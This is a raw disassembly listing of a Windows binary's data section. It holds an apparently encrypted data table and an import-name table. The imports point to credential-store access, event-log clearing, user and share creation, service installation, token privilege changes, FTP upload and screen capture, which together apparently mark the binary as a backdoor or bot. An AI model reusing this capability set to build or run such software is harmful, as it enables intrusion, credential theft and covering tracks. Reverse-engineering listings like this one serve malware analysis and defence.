dd 0B56F74E8h, 18ACF3D6h, 0CE89E299h, 0B4A84FE0h, 0FD13E0B7h
dd 7CC43B81h, 0D2ADA8D9h, 165FA266h, 80957705h, 93CC7314h
dd 211A1477h, 0E6AD2065h, 77B5FA86h, 0C75442F5h, 0FB9D35CFh
dd 0EBCDAF0Ch, 7B3E89A0h, 0D6411BD3h, 0AE1E7E49h, 250E2Dh
dd 2071B35Eh, 226800BBh, 57B8E0AFh, 2464369Bh, 0F009B91Eh
dd 5563911Dh, 59DFA6AAh, 78C14389h, 0D95A537Fh, 207D5BA2h
dd 2E5B9C5h, 83260376h, 6295CFA9h, 11C81968h, 4E734A41h
dd 0B3472DCAh, 7B14A94Ah, 1B510052h, 9A532915h, 0D60F573Fh
dd 0BC9BC6E4h, 2B60A476h, 81E67400h, 8BA6FB5h, 571BE91Fh
dd 0F296EC6Bh, 2A0DD915h, 0B6636521h, 0E7B9F9B6h, 0FF34052Eh
dd 0C5855664h, 53B02D5Dh, 0A99F8FA1h, 8BA4799h, 6E85076Ah
dd 4B7A70E9h, 0B5B32944h, 0DB75092Eh, 0C4192623h, 0AD6EA6B0h
dd 49A7DF7Dh, 9CEE60B8h, 8FEDB266h, 0ECAA8C71h, 699A17FFh
dd 5664526Ch, 0C2B19EE1h, 193602A5h, 75094C29h, 0A0591340h
dd 0E4183A3Eh, 3F54989Ah, 5B429D65h, 6B8FE4D6h, 99F73FD6h
dd 0A1D29C07h, 0EFE830F5h, 4D2D38E6h, 0F0255DC1h, 4CDD2086h
dd 8470EB26h, 6382E9C6h, 21ECC5Eh, 9686B3Fh, 3EBAEFC9h
dd 3C971814h, 6B6A70A1h, 687F3584h, 52A0E286h, 0B79C5305h
dd 0AA500737h, 3E07841Ch, 7FDEAE5Ch, 8E7D44ECh, 5716F2B8h
dd 0B03ADA37h, 0F0500C0Dh, 0F01C1F04h, 200B3FFh, 0AE0CF51Ah
dd 3CB574B2h, 25837A58h, 0DC0921BDh, 0D19113F9h, 7CA92FF6h
dd 94324773h, 22F54701h, 3AE5E581h, 37C2DADCh, 0C8B57634h
dd 9AF3DDA7h, 0A9446146h, 0FD0030Eh, 0ECC8C73Eh, 0A4751E41h
dd 0E238CD99h, 3BEA0E2Fh, 3280BBA1h, 183EB331h, 4E548B38h
dd 4F6DB908h, 6F420D03h, 0F60A04BFh, 2CB81290h, 24977C79h
dd 5679B072h, 0BCAF89AFh, 0DE9A771Fh, 0D9930810h, 0B38BAE12h
dd 0DCCF3F2Eh, 5512721Fh, 2E6B7124h, 501ADDE6h, 9F84CD87h
dd 7A584718h, 7408DA17h, 0BC9F9ABCh, 0E94B7D8Ch, 0EC7AEC3Ah
dd 0DB851DFAh, 63094366h, 0C464C3D2h, 0EF1C1847h, 3215D908h
dd 0DD433B37h, 24C2BA16h, 12A14D43h, 2A65C451h, 50940002h
dd 133AE4DDh, 71DFF89Eh, 10314E55h, 81AC77D6h, 5F11199Bh
dd 43556F1h, 0D7A3C76Bh, 3C11183Bh, 5924A509h, 0F28FE6EDh
dd 97F1FBFAh, 9EBABF2Ch, 1E153C6Eh, 86E34570h, 0EAE96FB1h
dd 860E5E0Ah, 5A3E2AB3h, 771FE71Ch, 4E3D06FAh, 2965DCB9h
dd 99E71D0Fh, 803E89D6h, 5266C825h, 2E4CC978h, 9C10B36Ah
dd 0C6150EBAh, 94E2EA78h, 0A5FC3C53h, 1E0A2DF4h, 0F2F74EA7h
dd 361D2B3Dh, 1939260Fh, 19C27960h, 5223A708h, 0F71312B6h
dd 0EBADFE6Eh, 0EAC31F66h, 0E3BC4595h, 0A67BC883h, 0B17F37D1h
dd 18CFF28h, 0C332DDEFh, 0BE6C5AA5h, 65582185h, 68AB9802h
dd 0EECEA50Fh, 0DB2F953Bh, 2AEF7DADh, 5B6E2F84h, 1521B628h
dd 29076170h, 0ECDD4775h, 619F1510h, 13CCA830h, 0EB61BD96h
dd 334FE1Eh, 0AA0363CFh, 0B5735C90h, 4C70A239h, 0D59E9E0Bh
dd 0CBAADE14h, 0EECC86BCh, 60622CA7h, 9CAB5CABh, 0B2F3846Eh
dd 648B1EAFh, 19BDF0CAh, 0A02369B9h, 655ABB50h, 40685A32h
dd 3C2AB4B3h, 319EE9D5h, 0C021B8F7h, 9B540B19h, 875FA099h
dd 95F7997Eh, 623D7DA8h, 0F837889Ah, 97E32D77h, 11ED935Fh
dd 16681281h, 0E358829h, 0C7E61FD6h, 96DEDFA1h, 7858BA99h
dd 57F584A5h, 1B227263h, 9B83C3FFh, 1AC24696h, 0CDB30AEBh
dd 532E3054h, 8FD948E4h, 6DBC3128h, 58EBF2EFh, 34C6FFEAh
dd 0FE28ED61h, 0EE7C3C73h, 5D4A14D9h, 0E864B7E3h, 42105D14h
dd 203E13E0h, 45EEE2B6h, 0A3AAABEAh, 0DB6C4F15h, 0FACB4FD0h
dd 0C742F442h, 0EF6ABBB5h, 654F3B1Dh, 41CD2105h, 0D81E799Eh
dd 86854DC7h, 0E44B476Ah, 3D816250h, 0CF62A1F2h, 5B8D2646h
dd 0FC8883A0h, 0C1C7B6A3h, 7F1524C3h, 69CB7492h, 47848A0Bh
dd 5692B285h, 95BBF00h, 0AD19489Dh, 1462B174h, 23820E00h
dd 58428D2Ah, 0C55F5EAh, 1DADF43Eh, 233F7061h, 3372F092h
dd 8D937E41h, 0D65FECF1h, 6C223BDBh, 7CDE3759h, 0CBEE7460h
dd 4085F2A7h, 0CE77326Eh, 0A6078084h, 19F8509Eh, 0E8EFD855h
dd 61D99735h, 0A969A7AAh, 0C50C06C2h, 5A04ABFCh, 800BCADCh
dd 9E447A2Eh, 0C3453484h, 0FDD56705h, 0E1E9EC9h, 0DB73DBD3h
dd 105588CDh, 675FDA79h, 0E3674340h, 0C5C43465h, 713E38D8h
dd 3D28F89Eh, 0F16DFF20h, 153E21E7h, 8FB03D4Ah, 0E6E39F2Bh
dd 0DB83ADF7h, 0E93D5A68h
dd 948140F7h, 0F64C261Ch, 94692934h, 411520F7h, 7602D4F7h
dd 0BCF46B2Eh, 0D4A20068h, 0D4082471h, 3320F46Ah, 43B7D4B7h
dd 500061AFh, 1E39F62Eh, 97244546h, 14214F74h, 0BF8B8840h
dd 4D95FC1Dh, 96B591AFh, 70F4DDD3h, 66A02F45h, 0BFBC09ECh
dd 3BD9785h, 7FAC6DD0h, 31CB8504h, 96EB27B3h, 55FD3941h
dd 0DA2547E6h, 0ABCA0A9Ah, 28507825h, 530429F4h, 0A2C86DAh
dd 0E9B66DFBh, 68DC1462h, 0D7486900h, 680EC0A4h, 27A18DEEh
dd 4F3FFEA2h, 0E887AD8Ch, 0B58CE006h, 7AF4D6B6h, 0AACE1E7Ch
dd 0D3375FECh, 0CE78A399h, 406B2A42h, 20FE9E35h, 0D9F385B9h
dd 0EE39D7ABh, 3B124E8Bh, 1DC9FAF7h, 4B6D1856h, 26A36631h
dd 0EAE397B2h, 3A6EFA74h, 0DD5B4332h, 6841E7F7h, 0CA7820FBh
dd 0FB0AF54Eh, 0D8FEB397h, 454056ACh, 0BA489527h, 55533A3Ah
dd 20838D87h, 0FE6BA9B7h, 0D096954Bh, 55A867BCh, 0A1159A58h
dd 0CCA92963h, 99E1DB33h, 0A62A4A56h, 3F3125F9h, 5EF47E1Ch
dd 9029317Ch, 0FDF8E802h, 4272F70h, 80BB155Ch, 5282CE3h
dd 95C11548h, 0E4C66D22h, 48C1133Fh, 0C70F86DCh, 7F9C9EEh
dd 41041F0Fh, 404779A4h, 5D886E17h, 325F51EBh, 0D59BC0D1h
dd 0F2BCC18Fh, 41113564h, 257B7834h, 602A9C60h, 0DFF8E8A3h
dd 1F636C1Bh, 0E12B4C2h, 2E1329Eh, 0AF664FD1h, 0CAD18115h
dd 6B2395E0h, 333E92E1h, 3B240B62h, 0EEBEB922h, 85B2A20Eh
dd 0E6BA0D99h, 0DE720C8Ch, 2DA2F728h, 0D0127845h, 95B794FDh
dd 647D0862h, 0E7CCF5F0h, 5449A36Fh, 877D48FAh, 0C39DFD27h
dd 0F33E8D1Eh, 0A476341h, 992EFF74h, 3A6F6EABh, 0F4F8FD37h
dd 0A812DC60h, 0A1EBDDF8h, 991BE14Ch, 0DB6E6B0Dh, 0C67B5510h
dd 6D672C37h, 2765D43Bh, 0DCD0E804h, 0F1290DC7h, 0CC00FFA3h
dd 0B5390F92h, 690FED0Bh, 667B9FFBh, 0CEDB7D9Ch, 0A091CF0Bh
dd 0D9155EA3h, 0BB132F88h, 515BAD24h, 7B9479BFh, 763BD6EBh
dd 37392EB3h, 0CC115979h, 8026E297h, 0F42E312Dh, 6842ADA7h
dd 0C66A2B3Bh, 12754CCCh, 782EF11Ch, 6A124237h, 0B79251E7h
dd 6A1BBE6h, 4BFB6350h, 1A6B1018h, 11CAEDFAh, 3D25BDD8h
dd 0E2E1C3C9h, 44421659h, 0A121386h, 0D90CEC6Eh, 0D5ABEA2Ah
dd 64AF674Eh, 0DA86A85Fh, 0BEBFE988h, 64E4C3FEh, 9DBC8057h
dd 0F0F7C086h, 60787BF8h, 6003604Dh, 0D1FD8346h, 0F6381FB0h
dd 7745AE04h, 0D736FCCCh, 83426B33h, 0F01EAB71h, 0B0804187h
dd 3C005E5Fh, 77A057BEh, 0BDE8AE24h, 55464299h, 0BF582E61h
dd 4E58F48Fh, 0F2DDFDA2h, 0F474EF38h, 8789BDC2h, 5366F9C3h
dd 0C8B38E74h, 0B475F255h, 46FCD9B9h, 7AEB2661h, 8B1DDF84h
dd 846A0E79h, 915F95E2h, 466E598Eh, 20B45770h, 8CD55591h
dd 0C902DE4Ch, 0B90BACE1h, 0BB8205D0h, 11A86248h, 7574A99Eh
dd 0B77F19B6h, 0E0A9DC09h, 662D09A1h, 0C4324633h, 0E85A1F02h
dd 9F0BE8Ch, 4A99A025h, 1D6EFE10h, 1AB93D1Dh, 0BA5A4DFh
dd 0A186F20Fh, 2868F169h, 0DCB7DA83h, 573906FEh, 0A1E2CE9Bh
dd 4FCD7F52h, 50115E01h, 0A70683FAh, 0A002B5C4h, 0DE6D027h
dd 9AF88C27h, 773F8641h, 0C3604C06h, 61A806B5h, 0F0177A28h
dd 0C0F586E0h, 6058AAh, 30DC7D62h, 11E69ED7h, 2338EA63h
dd 53C2DD94h, 0C2C21634h, 0BBCBEE56h, 90BCB6DEh, 0EBFC7DA1h
dd 0CE591D76h, 6F05E409h, 4B7C0188h, 39720A3Dh, 7C927C24h
dd 86E3725Fh, 724D9DB9h, 1AC15BB4h, 0D39EB8FCh, 0ED545578h
dd 8FCA5B5h, 0D83D7CD3h, 4DAD0FC4h, 1E50EF5Eh, 0B161E6F8h
dd 0A28514D9h, 6C51133Ch, 6FD5C7E7h, 56E14EC4h, 362ABFCEh
dd 0DDC6C837h, 0D79A3234h, 92638212h, 670EFA8Eh, 406000E0h
dd 3A39CE37h, 0D3FAF5CFh, 0ABC27737h, 5AC52D1Bh, 5CB0679Eh
dd 4FA33742h, 0D3822740h, 99BC9BBEh, 0D5118E9Dh, 0BF0F7315h
dd 0D62D1C7Eh, 0C700C47Bh, 0B78C1B6Bh, 21A19045h, 0B26EB1BEh
dd 6A366EB4h, 5748AB2Fh, 0BC946E79h, 0C6A376D2h, 6549C2C8h
dd 530FF8EEh, 468DDE7Dh, 0D5730A1Dh, 4CD04DC6h, 2939BBDBh
dd 0A9BA4650h, 0AC9526E8h, 0BE5EE304h, 0A1FAD5F0h, 6A2D519Ah
dd 63EF8CE2h, 9A86EE22h, 0C089C2B8h, 43242EF6h, 0A51E03AAh
dd 9CF2D0A4h, 83C061BAh, 9BE96A4Dh, 8FE51550h, 0BA645BD6h
dd 2826A2F9h, 0A73A3AE1h, 4BA99586h, 0EF5562E9h, 0C72FEFD3h
dd 0F752F7DAh, 3F046F69h, 77FA0A59h, 80E4A915h, 87B08601h
dd 9B09E6ADh, 3B3EE593h, 0E990FD5Ah, 9E34D797h, 2CF0B7D9h
dd 22B8B51h, 96D5AC3Ah, 17DA67Dh, 0D1CF3ED6h, 7C7D2D28h
dd 1F9F25CFh, 0ADF2B89Bh, 5AD6B472h, 5A88F54Ch, 0E029AC71h
dd 0E019A5E6h, 47B0ACFDh, 0ED93FA9Bh, 0E8D3C48Dh, 283B57CCh
dd 0F8D56629h, 79132E28h, 785F0191h, 0ED756055h, 0F7960E44h
dd 0E3D35E8Ch, 15056DD4h, 88F46DBAh, 3A16125h, 564F0BDh
dd 0C3EB9E15h, 3C9057A2h, 97271AECh, 0A93A072Ah, 1B3F6D9Bh
dd 1E6321F5h, 0F59C66FBh, 26DCF319h, 7533D928h, 0B155FDF5h
dd 3563482h, 8ABA3CBBh, 28517711h, 0C20AD9F8h, 0ABCC5167h
dd 0CCAD925Fh, 4DE81751h, 3830DC8Eh, 379D5862h, 9320F991h
dd 0EA7A90C2h, 0FB3E7BCEh, 5121CE64h, 774FBE32h, 0A8B6E37Eh
dd 0C3293D46h, 48DE5369h, 6413E680h, 0A2AE0810h, 0DD6DB224h
dd 69852DFDh, 9072166h, 0B39A460Ah, 6445C0DDh, 586CDECFh
dd 1C20C8AEh, 5BBEF7DDh, 1B588D40h, 0CCD2017Fh, 6BB4E3BBh
dd 0DDA26A7Eh, 3A59FF45h, 3E350A44h, 0BCB4CDD5h, 72EACEA8h
dd 0FA6484BBh, 8D6612AEh, 0BF3C6F47h, 0D29BE463h, 542F5D9Eh
dd 0AEC2771Bh, 0F64E6370h, 740E0D8Dh, 0E75B1357h, 0F8721671h
dd 0AF537D5Dh, 4040CB08h, 4EB4E2CCh, 34D2466Ah, 115AF84h
dd 0E1B00428h, 95983A1Dh, 6B89FB4h, 0CE6EA048h, 6F3F3B82h
dd 3520AB82h, 11A1D4Bh, 277227F8h, 611560B1h, 0E7933FDCh
dd 0BB3A792Bh, 344525BDh, 0A08839E1h, 51CE794Bh, 2F32C9B7h
dd 0A01FBAC9h, 0E01CC87Eh, 0BCC7D1F6h, 0CF0111C3h, 0A1E8AAC7h
dd 1A908749h, 0D44FBD9Ah, 0D0DADECBh, 0D50ADA38h, 339C32Ah
dd 0C6913667h, 8DF9317Ch, 0E0B12B4Fh, 0F79E59B7h, 43F5BB3Ah
dd 0F2D519FFh, 27D9459Ch, 0BF97222Ch, 15E6FC2Ah, 0F91FC71h
dd 9B941525h, 0FAE59361h, 0CEB69CEBh, 0C2A86459h, 12BAA8D1h
dd 0B6C1075Eh, 0E3056A0Ch, 10D25065h, 0CB03A442h, 0E0EC6E0Eh
dd 1698DB3Bh, 4C98A0BEh, 3278E964h, 9F1F9532h, 0E0D392DFh
dd 0D3A0342Bh, 8971F21Eh, 1B0A7441h, 4BA3348Ch, 0C5BE7120h
dd 0C37632D8h, 0DF359F8Dh, 9B992F2Eh, 0E60B6F47h, 0FE3F11Dh
dd 0E54CDA54h, 1EDAD891h, 0CE6279CFh, 0CD3E7E6Fh, 1618B166h
dd 0FD2C1D05h, 848FD2C5h, 0F6FB2299h, 0F523F357h, 0A6327623h
dd 93A83531h, 56CCCD02h, 0ACF08162h, 5A75EBB5h, 6E163697h
dd 88D273CCh, 0DE966292h, 81B949D0h, 4C50901Bh, 71C65614h
dd 0E6C6C7BDh, 327A140Ah, 45E1D006h, 0C3F27B9Ah, 0C9AA53FDh
dd 62A80F00h, 0BB25BFE2h, 35BDD2F6h, 71126905h, 0B2040222h
dd 0B6CBCF7Ch, 0CD769C2Bh, 53113EC0h, 1640E3D3h, 38ABBD60h
dd 2547ADF0h, 0BA38209Ch, 0F746CE76h, 77AFA1C5h, 20756060h
dd 85CBFE4Eh, 8AE88DD8h, 7AAAF9B0h, 4CF9AA7Eh, 1948C25Ch
dd 2FB8A8Ch, 1C36AE4h, 0D6EBE1F9h, 90D4F869h, 0A65CDEA0h
dd 3F09252Dh, 0C208E69Fh, 0B74E6132h, 0CE77E25Bh, 578FDFE3h
dd 3AC372E6h, 0
dd 0E7h dup(0)
off_442B48 dd offset dword_442B90 ; DATA XREF: sub_416FF6:loc_416FF8�r
; sub_417010+E3�r ...
align 10h
dword_442B50 dd 80h, 0Eh dup(0) dd 80000000h
dword_442B90 dd 31302F2Eh, 35343332h, 39383736h, 64636261h, 68676665h
; DATA XREF: .text:off_442B48�o
dd 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h, 42417A79h
dd 46454443h, 4A494847h, 4E4D4C4Bh, 5251504Fh, 56555453h
dd 5A595857h, 0A4A3A2A1h, 0A8A7A6A5h, 0ACABAAA9h, 0B0AFAEADh
dd 0B4B3B2B1h, 0B8B7B6B5h, 0BCBBBAB9h, 0C0BFBEBDh, 0C4C3C2C1h
dd 0C8C7C6C5h, 0CCCBCAC9h, 0D0CFCECDh, 0D4D3D2D1h, 0D8D7D6D5h
dd 0DCDBDAD9h, 0E0DFDEDDh, 0E4E3E2E1h, 0E8E7E6E5h, 0ECEBEAE9h
dd 0F0EFEEEDh, 0F4F3F2F1h, 0F8F7F6F5h, 0FCFBFAF9h, 0FFFEFDh
a02x02x02x02x02 db '%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x',0
; DATA XREF: sub_415440+64�o
align 4
aS_3 db '+%s',0 ; DATA XREF: sub_41553D+26�o
aPathremovefile db 'PathRemoveFileSpecA',0 ; DATA XREF: sub_41729C+F2D�o
aShlwapi_dll db 'shlwapi.dll',0 ; DATA XREF: sub_41729C:loc_4181BE�o
aPstorecreatein db 'PStoreCreateInstance',0 ; DATA XREF: sub_41729C+EFE�o
align 10h
aPstorec_dll db 'pstorec.dll',0 ; DATA XREF: sub_41729C:loc_41818F�o
aGetprocessmemo db 'GetProcessMemoryInfo',0 ; DATA XREF: sub_41729C+EA2�o
align 4
aEnumprocesses db 'EnumProcesses',0 ; DATA XREF: sub_41729C+E95�o
align 4
aEnumprocessmod db 'EnumProcessModules',0 ; DATA XREF: sub_41729C+E88�o
align 4
aGetmodulebasen db 'GetModuleBaseNameA',0 ; DATA XREF: sub_41729C+E7B�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_41729C+E73�o
align 4
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_41729C:loc_418102�o
align 10h
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_41729C+E11�o
align 10h
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_41729C+E04�o
align 10h
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_41729C+DF7�o
align 10h
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_41729C+DEA�o
align 10h
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_41729C+DDD�o
align 10h
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_41729C+DD5�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_41729C:loc_418064�o
align 10h
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_41729C+D93�o
align 10h
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_41729C+D8B�o
align 10h
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_41729C:loc_41801A�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_41729C+D39�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_41729C+D2C�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_41729C+D1F�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_41729C+D17�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_41729C:loc_417FA6�o
aGetnetworkpara db 'GetNetworkParams',0 ; DATA XREF: sub_41729C:loc_417F7E�o
align 10h
aGetudptable db 'GetUdpTable',0 ; DATA XREF: sub_41729C+CA2�o
aGettcptable db 'GetTcpTable',0 ; DATA XREF: sub_41729C+C95�o
aGetiftable db 'GetIfTable',0 ; DATA XREF: sub_41729C+C88�o
align 4
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_41729C+C7B�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_41729C+C73�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_41729C:loc_417EFE�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_41729C+C2D�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_41729C+C25�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_41729C:loc_417EB4�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_41729C+B9B�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_41729C+B8E�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_41729C+B81�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_41729C+B74�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_41729C+B67�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_41729C+B5A�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_41729C+B4D�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_41729C+B40�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_41729C+B33�o
align 10h
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_41729C+B26�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_41729C+B1E�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_41729C+AD0�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_41729C+AC3�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_41729C+ABB�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_41729C:loc_417D4A�o
align 4
aMozilla5_0 db 'Mozilla/5.0',0 ; DATA XREF: sub_41729C+A81�o
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_41729C+A0F�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_41729C+A02�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_41729C+9F5�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_41729C+9E8�o
align 10h
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_41729C+9DB�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_41729C+9CE�o
align 4
aFtpputfilea db 'FtpPutFileA',0 ; DATA XREF: sub_41729C+9C1�o
aFtpgetfilea db 'FtpGetFileA',0 ; DATA XREF: sub_41729C+9B4�o
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_41729C+9A7�o
align 10h
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_41729C+99A�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_41729C+98D�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_41729C+985�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_41729C:loc_417C10�o
aShutdown db 'shutdown',0 ; DATA XREF: sub_41729C+837�o
; sub_41EBD7+126�o
align 4
aClosesocket db 'closesocket',0 ; DATA XREF: sub_41729C+82A�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_41729C+81D�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_41729C+810�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_41729C+803�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_41729C+7F6�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_41729C+7E9�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_41729C+7DC�o
align 10h
aAccept db 'accept',0 ; DATA XREF: sub_41729C+7CF�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_41729C+7C2�o
align 10h
aSelect db 'select',0 ; DATA XREF: sub_41729C+7B5�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_41729C+7AD�o
align 10h
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_41729C+79B�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_41729C+78E�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_41729C+781�o
align 4
aSend db 'send',0 ; DATA XREF: sub_41729C+774�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_41729C+767�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_41729C+75A�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_41729C+74D�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_41729C+740�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_41729C+733�o
align 10h
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_41729C+726�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_41729C+719�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_41729C+70C�o
aSocket db 'socket',0 ; DATA XREF: sub_41729C+6FF�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_41729C+6F2�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_41729C+6E5�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_41729C+6D8�o
align 10h
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_41729C+6CB�o
align 10h
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_41729C+6BE�o
align 10h
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_41729C+6B1�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_41729C+6A9�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_41729C+698�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_41729C+625�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_41729C+618�o
align 10h
aBitblt db 'BitBlt',0 ; DATA XREF: sub_41729C+60B�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_41729C+5FE�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_41729C+5F1�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_41729C+5E4�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_41729C+5D7�o
align 10h
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_41729C+5CA�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_41729C+5C2�o
align 10h
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_41729C:loc_41784D�o
align 4
aCloseeventlog db 'CloseEventLog',0 ; DATA XREF: sub_41729C+574�o
align 4
aOpeneventloga db 'OpenEventLogA',0 ; DATA XREF: sub_41729C+567�o
align 4
aCleareventloga db 'ClearEventLogA',0 ; DATA XREF: sub_41729C:loc_4177FB�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_41729C:loc_4177E0�o
align 4
aSetservicestat db 'SetServiceStatus',0 ; DATA XREF: sub_41729C+4B4�o
align 10h
aRegisterserv_0 db 'RegisterServiceCtrlHandlerA',0 ; DATA XREF: sub_41729C+4A7�o
aUnlockserviced db 'UnlockServiceDatabase',0 ; DATA XREF: sub_41729C+49A�o
align 4
aChangeservicec db 'ChangeServiceConfig2A',0 ; DATA XREF: sub_41729C+48D�o
align 4
aQueryservicelo db 'QueryServiceLockStatusA',0 ; DATA XREF: sub_41729C+480�o
aLockservicedat db 'LockServiceDatabase',0 ; DATA XREF: sub_41729C+473�o
aImpersonatelog db 'ImpersonateLoggedOnUser',0 ; DATA XREF: sub_41729C+466�o
aStartservicect db 'StartServiceCtrlDispatcherA',0 ; DATA XREF: sub_41729C+459�o
aCreateservicea db 'CreateServiceA',0 ; DATA XREF: sub_41729C+44C�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_41729C+43F�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_41729C+432�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_41729C+425�o
align 10h
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_41729C+418�o
align 10h
aControlservice db 'ControlService',0 ; DATA XREF: sub_41729C+40B�o
align 10h
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_41729C+3FE�o
align 10h
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_41729C+3F1�o
align 10h
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_41729C:loc_417685�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_41729C+3B1�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_41729C+3A4�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_41729C+397�o
align 4
aOpenthreadtoke db 'OpenThreadToken',0 ; DATA XREF: sub_41729C:loc_41762B�o
aRegqueryinfoke db 'RegQueryInfoKeyA',0 ; DATA XREF: sub_41729C+32F�o
align 4
aRegenumvaluea db 'RegEnumValueA',0 ; DATA XREF: sub_41729C+322�o
align 4
aRegenumkeyexa db 'RegEnumKeyExA',0 ; DATA XREF: sub_41729C+315�o
align 4
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_41729C+308�o
